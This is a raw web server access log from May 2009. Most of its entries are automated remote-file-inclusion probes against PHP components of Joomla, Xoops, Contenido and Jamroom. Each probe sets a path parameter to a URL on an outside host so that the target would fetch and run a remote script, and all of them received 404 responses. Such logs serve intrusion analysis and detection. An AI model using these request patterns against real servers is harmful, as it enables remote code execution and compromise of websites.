72.52.255.82 - - [16/May/2009:00:35:28 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:00:35:34 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 239 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
72.52.255.82 - - [16/May/2009:00:35:34 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 234 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
209.59.12.99 - - [16/May/2009:00:35:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
208.80.195.34 - - [16/May/2009:00:35:55 -0400] "GET / HTTP/1.0" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Avant Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
58.227.193.198 - - [16/May/2009:00:35:58 -0400] "GET /logs/access_log.Q108072400%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:00:36:33 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:00:36:33 -0400] "GET /logs/access_log.Q108082400/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:00:36:33 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:00:36:37 -0400] "GET /logs/access_log.Q108121900/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:00:36:41 -0400] "GET /logs/access_log.Q108082400%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:00:36:41 -0400] "GET /logs/access_log.Q108121900%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
69.172.92.14 - - [16/May/2009:00:37:02 -0400] "GET /logs/access_log.Q108083000//components/com_simpleboard/image_upload.php?sbp=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.803"
110.45.144.106 - - [16/May/2009:00:37:10 -0400] "GET /logs/access_log.Q109022600/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:00:37:10 -0400] "GET /logs/access_log.Q108120600/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
87.106.135.14 - - [16/May/2009:00:37:12 -0400] "GET /logs/access_log.Q108083000//components/com_simpleboard/image_upload.php?sbp=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
110.45.144.106 - - [16/May/2009:00:37:30 -0400] "GET /logs/access_log.Q109022600/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:00:37:30 -0400] "GET /logs/access_log.Q108120600/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
88.84.128.40 - - [16/May/2009:00:37:46 -0400] "GET /logs/access_log.Q108083000//components/com_simpleboard/image_upload.php?sbp=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.803"
193.221.119.126 - - [16/May/2009:00:37:55 -0400] "GET /logs/access_log.Q108082400%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
193.221.119.126 - - [16/May/2009:00:38:00 -0400] "GET /logs/access_log.Q108121900%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
190.144.44.36 - - [16/May/2009:00:38:11 -0400] "GET /logs/errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
190.144.44.36 - - [16/May/2009:00:38:12 -0400] "GET /errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
72.52.255.82 - - [16/May/2009:00:38:13 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.52.255.82 - - [16/May/2009:00:38:13 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
218.150.79.146 - - [16/May/2009:00:38:42 -0400] "GET /logs/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
218.150.79.146 - - [16/May/2009:00:38:42 -0400] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
218.150.79.146 - - [16/May/2009:00:38:42 -0400] "GET /logs/access_log.Q108121400/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
218.150.79.146 - - [16/May/2009:00:38:44 -0400] "GET /logs/access_log.Q108072400/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
190.144.44.36 - - [16/May/2009:00:39:54 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 234 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
190.144.44.36 - - [16/May/2009:00:39:54 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 239 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
72.52.255.82 - - [16/May/2009:00:40:04 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:00:40:04 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
217.160.4.250 - - [16/May/2009:00:40:10 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aladin-online.com/new/components/com_virtuemart/shop_image/vendor/test.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
217.160.4.250 - - [16/May/2009:00:40:11 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://aladin-online.com/new/components/com_virtuemart/shop_image/vendor/test.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
190.144.44.36 - - [16/May/2009:00:40:23 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
190.144.44.36 - - [16/May/2009:00:40:23 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
72.52.255.82 - - [16/May/2009:00:40:24 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.52.255.82 - - [16/May/2009:00:40:24 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
58.227.193.198 - - [16/May/2009:00:40:24 -0400] "GET /logs/access_log.Q108082400%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
209.59.12.99 - - [16/May/2009:00:40:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
193.221.119.126 - - [16/May/2009:00:40:57 -0400] "GET /logs/access_log.Q109012800//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
58.227.193.198 - - [16/May/2009:00:41:08 -0400] "GET /logs/error_log.Q108082400%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
72.52.255.82 - - [16/May/2009:00:42:08 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 254 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
72.52.255.82 - - [16/May/2009:00:42:08 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 249 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
218.150.79.146 - - [16/May/2009:00:42:12 -0400] "GET /logs/access_log.Q109012800/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
72.52.255.82 - - [16/May/2009:00:42:25 -0400] "GET /errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:00:42:25 -0400] "GET /logs/errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:00:42:33 -0400] "GET /errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.52.255.82 - - [16/May/2009:00:42:33 -0400] "GET /logs/errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
218.150.79.146 - - [16/May/2009:00:42:38 -0400] "GET /logs/access_log.Q108072400%20%20/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
218.150.79.146 - - [16/May/2009:00:42:52 -0400] "GET /logs/access_log.Q108111300%20%20/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:00:42:56 -0400] "GET /logs/access_log.Q108112400/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
72.52.230.168 - - [16/May/2009:00:42:56 -0400] "GET /logs/access_log.Q108090500/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
72.52.255.82 - - [16/May/2009:00:44:02 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.52.255.82 - - [16/May/2009:00:44:02 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.52.255.82 - - [16/May/2009:00:44:04 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:00:44:04 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
222.122.26.5 - - [16/May/2009:00:44:08 -0400] "GET /logs/index.php?pagina=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
222.122.26.5 - - [16/May/2009:00:44:08 -0400] "GET /logs/access_log.Q108090900/index.php?pagina=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.122.26.5 - - [16/May/2009:00:44:11 -0400] "GET /index.php?pagina=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
72.52.255.82 - - [16/May/2009:00:44:27 -0400] "GET /errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
72.52.255.82 - - [16/May/2009:00:44:27 -0400] "GET /logs/errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
190.144.44.36 - - [16/May/2009:00:44:41 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 254 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
190.144.44.36 - - [16/May/2009:00:44:41 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 249 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
72.52.255.82 - - [16/May/2009:00:45:02 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.52.255.82 - - [16/May/2009:00:45:02 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
66.232.102.70 - - [16/May/2009:00:45:03 -0400] "GET /logs/access_log.Q109030500//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.813"
66.232.102.70 - - [16/May/2009:00:45:03 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
66.232.102.70 - - [16/May/2009:00:45:03 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.813"
66.249.72.114 - - [16/May/2009:00:45:13 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L001BC44C07E1A900FC0C05L+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.114 - - [16/May/2009:00:45:24 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.114 - - [16/May/2009:00:45:24 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L001BC44C09517900F90C05L+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
72.52.255.82 - - [16/May/2009:00:45:54 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 249 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
72.52.255.82 - - [16/May/2009:00:45:54 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 254 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
209.59.12.99 - - [16/May/2009:00:45:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.52.255.82 - - [16/May/2009:00:45:59 -0400] "GET /errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.52.255.82 - - [16/May/2009:00:45:59 -0400] "GET /logs/errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
110.45.144.106 - - [16/May/2009:00:46:18 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:00:46:18 -0400] "GET /logs/error_log.Q109042000%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:00:46:18 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:00:46:26 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:00:46:26 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
110.45.144.106 - - [16/May/2009:00:46:26 -0400] "GET /logs/error_log.Q109042000%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
72.52.255.82 - - [16/May/2009:00:46:26 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:00:46:26 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
61.67.196.130 - - [16/May/2009:00:46:35 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://208.98.22.241/id.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
61.67.196.130 - - [16/May/2009:00:46:35 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://208.98.22.241/id.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
61.67.196.130 - - [16/May/2009:00:46:35 -0400] "GET /logs/access_log.Q108082000//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://208.98.22.241/id.txt?? HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
190.144.44.36 - - [16/May/2009:00:46:57 -0400] "GET /logs/errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 213 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
190.144.44.36 - - [16/May/2009:00:46:57 -0400] "GET /errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 208 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
72.52.255.82 - - [16/May/2009:00:47:10 -0400] "GET /errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
72.52.255.82 - - [16/May/2009:00:47:10 -0400] "GET /logs/errors.php?error=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
61.67.196.130 - - [16/May/2009:00:47:19 -0400] "GET /logs/access_log.Q108090800//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://208.98.22.241/id.txt?? HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
222.122.26.5 - - [16/May/2009:00:47:35 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
222.122.26.5 - - [16/May/2009:00:47:35 -0400] "GET /logs/access_log.Q108090400//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
222.122.26.5 - - [16/May/2009:00:47:35 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
66.232.102.70 - - [16/May/2009:00:47:44 -0400] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
66.232.102.70 - - [16/May/2009:00:47:44 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.232.102.70 - - [16/May/2009:00:47:44 -0400] "GET /logs/access_log.Q109030500%20%20//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.52.255.82 - - [16/May/2009:00:47:50 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.52.255.82 - - [16/May/2009:00:47:50 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.52.255.82 - - [16/May/2009:00:48:12 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
72.52.255.82 - - [16/May/2009:00:48:12 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rainbowofdiamonds.com/scripts/test?? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
58.227.193.198 - - [16/May/2009:00:48:28 -0400] "GET /logs/access_log.Q108112400/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
